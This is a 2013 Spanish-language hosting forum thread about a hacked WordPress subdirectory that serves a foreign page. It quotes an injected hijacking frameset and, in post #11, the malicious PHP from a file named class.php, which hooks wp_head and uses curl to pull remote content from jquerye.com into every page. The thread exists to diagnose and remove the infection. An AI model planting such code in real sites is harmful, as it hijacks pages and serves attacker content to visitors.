Foros del Web » Administración de Sistemas » Shared Hosting y VPS »

Mi web muestra otra pagina

Estas en el tema de Mi web muestra otra pagina en el foro de Shared Hosting y VPS en Foros del Web. Estaba trabajando en la nueva version de una web. Código: http://cristounicaesperanza.org/nuevaweb/ y ahora resulta q sale otra pagina extraña. Ya revise las opciones del Wordpress ...
  #1 (permalink)  
Antiguo 14/02/2013, 17:44
Avatar de DJYovera  
Fecha de Ingreso: febrero-2012
Mensajes: 12
Antigüedad: 7 años, 10 meses
Puntos: 0
Mi web muestra otra pagina

Estaba trabajando en la nueva version de una web.

Código:
http://cristounicaesperanza.org/nuevaweb/
y ahora resulta q sale otra pagina extraña. Ya revise las opciones del Wordpress y esta bien, esta seleccionada la pagina estatica y una q denomine FrontPage y el contenido de esa pagina es correcta. Me fui a la base de datos MySQL y tambien esta bien el dominio... alguna otra idea?

Gracias
  #2 (permalink)  
Antiguo 14/02/2013, 18:29
Avatar de nexohosting  
Fecha de Ingreso: octubre-2008
Ubicación: ESPAÑA
Mensajes: 1.195
Antigüedad: 11 años, 1 mes
Puntos: 36
Respuesta: Mi web muestra otra pagina

Mira el codigo html de tu pagina hay un frame

<frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
<frame src="http://pagesinxt.com/?dn=www.jquerye.com&fp=iCa35SeExwvK%2Bjyts6Qg1RT9f yfOd8v0tvwDNChFGkdYeUG2aglgSlJUeA0UJO8uikuyaRrMWQn UImYq6tAWmg%3D%3D&prvtof=hH%2Fic37RUNIeuqLmJ3bmL%2 BLrbvpprF0gOiER6XS51j0%3D&poru=idNw7kd%2BGt8%2FDH% 2Fd%2FI8oEWAkrFnfeZuP56shLPyWqvGcuJreQhduwYfYoiQ2i 2Z1cJGipPhXFU9c%2FVwZ7jXphEtO9hnEYg66cTv6su5eyog%3 D&flrdr=yes&nxte=js">
</frameset>
<noframes>
<body bgcolor="#ffffff" text="#000000">
<a href="http://pagesinxt.com/?dn=www.jquerye.com&fp=iCa35SeExwvK%2Bjyts6Qg1RT9f yfOd8v0tvwDNChFGkdYeUG2aglgSlJUeA0UJO8uikuyaRrMWQn UImYq6tAWmg%3D%3D&prvtof=2mLsZRjJ1%2FwxH1OHrSj4Hcu 31ELXxRpDP6jZv5WVHjI%3D&poru=PXYOMPGNTH0Pei08XHKZd XJUK1M4k3%2FhevqoXBHCoDq%2Faxi2v8hqapiclO2jrG%2F%2 B46YUewqMlJUU4J0Ulv%2FMOYnEYayBMRkQlEB5f2QFscE%3D& flrdr=yes&nxte=js">Click here to proceed</a>.
</body>
</noframes><!--
__________________
Hosting SSD Multidominio | | VPS administrados
NexoHosting - Tlf. 953890112 - España
  #3 (permalink)  
Antiguo 14/02/2013, 20:00
Avatar de DJYovera  
Fecha de Ingreso: febrero-2012
Mensajes: 12
Antigüedad: 7 años, 10 meses
Puntos: 0
Respuesta: Mi web muestra otra pagina

eso es lo q no entiendo... es WORDPRESS... de donde sale eso?... wordpress no es php?
  #4 (permalink)  
Antiguo 14/02/2013, 20:54
Avatar de CoriaWeb  
Fecha de Ingreso: septiembre-2012
Ubicación: Coria del Río - Sevilla
Mensajes: 1.799
Antigüedad: 7 años, 2 meses
Puntos: 130
Respuesta: Mi web muestra otra pagina

Antes te funcionaba bien? es decir llevas ya tiempo funcionando con esa web y ha sido de repente ese error?
__________________
Hosting de Calidad
Servidores Dedicados Administrados
CoriaWeb.hosting
  #5 (permalink)  
Antiguo 14/02/2013, 21:07
Avatar de JoshMex
Moderador Webhosting
 
Fecha de Ingreso: enero-2006
Mensajes: 4.056
Antigüedad: 13 años, 10 meses
Puntos: 166
Respuesta: Mi web muestra otra pagina

Tu sitio web fue vulnerado, restaura un backup, aplica todas las actualizaciones a WP y sus plugins, cambia password de ftp y basede datos.
__________________
JoshMex
Desarrollador Plataforma Microsoft / Windows / ASP / ASP.NET / SQL Server
Es inútil hacer cualquier cosa a prueba de tontos, porque los tontos son muy ingeniosos
  #6 (permalink)  
Antiguo 14/02/2013, 21:26
Avatar de DJYovera  
Fecha de Ingreso: febrero-2012
Mensajes: 12
Antigüedad: 7 años, 10 meses
Puntos: 0
Respuesta: Mi web muestra otra pagina

En verdad no entraba desde el año pasado xD. Recien decidi terminar algunas fallas que habian para mandarlo al ruedo y me doy con la sorpresa q esta asi. Antes ha estado funcionando bien.

Si de dan cuenta es un pequeño directorio de mi web
Código:
http://www.cristounicaesperanza/nuevaweb
solo eso no funciona pero si entran a la web q ahorita esta en linea
Código:
www.cristounicaesperanza.org
esa web si funciona bien.. :/
  #7 (permalink)  
Antiguo 15/02/2013, 11:17
Avatar de infranetworking  
Fecha de Ingreso: marzo-2008
Ubicación: @ Internet
Mensajes: 240
Antigüedad: 11 años, 8 meses
Puntos: 11
Respuesta: Mi web muestra otra pagina

Yo en tu lugar seguiría los consejos de JoshMex, todo indica que ha sido un pequeño hackeo. WP por sí solito no hace eso y además no habías actualizado el sitio en mucho tiempo según comentas.

Saludos.
__________________
Infranetworking.com - Servidores Dedicados, Administración de Servidores, Hosting Reseller y Cloud Hosting
  #8 (permalink)  
Antiguo 16/02/2013, 00:34
Avatar de DJYovera  
Fecha de Ingreso: febrero-2012
Mensajes: 12
Antigüedad: 7 años, 10 meses
Puntos: 0
Respuesta: Mi web muestra otra pagina

no tengo backups :/ o ahorita puedo sacar del wordpress y mysql?
  #9 (permalink)  
Antiguo 16/02/2013, 01:23
Avatar de CoriaWeb  
Fecha de Ingreso: septiembre-2012
Ubicación: Coria del Río - Sevilla
Mensajes: 1.799
Antigüedad: 7 años, 2 meses
Puntos: 130
Respuesta: Mi web muestra otra pagina

Si no tienes backups lo tienes un poco dificil :D, solo tienes dos opciones creo, limpiarlo a mano o olvidarlo y empezar de 0 ;)
__________________
Hosting de Calidad
Servidores Dedicados Administrados
CoriaWeb.hosting
  #10 (permalink)  
Antiguo 16/02/2013, 10:36
Avatar de nexohosting  
Fecha de Ingreso: octubre-2008
Ubicación: ESPAÑA
Mensajes: 1.195
Antigüedad: 11 años, 1 mes
Puntos: 36
Respuesta: Mi web muestra otra pagina

Puedes bajar tu wordpress y revisar el codigo de los archivos sospechos y eliminar las lineas que sobren. Pero lo primero que haria es actualizar el blog a la ultima version
__________________
Hosting SSD Multidominio | | VPS administrados
NexoHosting - Tlf. 953890112 - España
  #11 (permalink)  
Antiguo 17/02/2013, 12:13
Avatar de DJYovera  
Fecha de Ingreso: febrero-2012
Mensajes: 12
Antigüedad: 7 años, 10 meses
Puntos: 0
Respuesta: Mi web muestra otra pagina

Encontre el error: descarge todo mi pagina la revise en mi pc y encontre un archivo que se llama "class.php"

y contiene
Código:
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
alguien q sepa de esto me puede ayudar?...
he intentado simplemente eliminar ese archivo pero la pagina se desconfiguro, osea si sale la pagina pero me sale errores de fallas y letras malogradas...
  #12 (permalink)  
Antiguo 17/02/2013, 12:53
Avatar de DJYovera  
Fecha de Ingreso: febrero-2012
Mensajes: 12
Antigüedad: 7 años, 10 meses
Puntos: 0
Respuesta: Mi web muestra otra pagina

listo, buscando buscando encontre la solucion... El problema si era ese codigo, por si alguien tuviera el mismo error:

todo el codigo que estaba dentro del archivo class.php
le he reemplazado por

Código:
<?php ?>
y hasta ahora me va de las mil maravillas, no tengo problemas.... Gracias x su ayudaa! :D

Etiquetas: dominio, muestra, mysql, web-hosting, wordpress
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 23:58.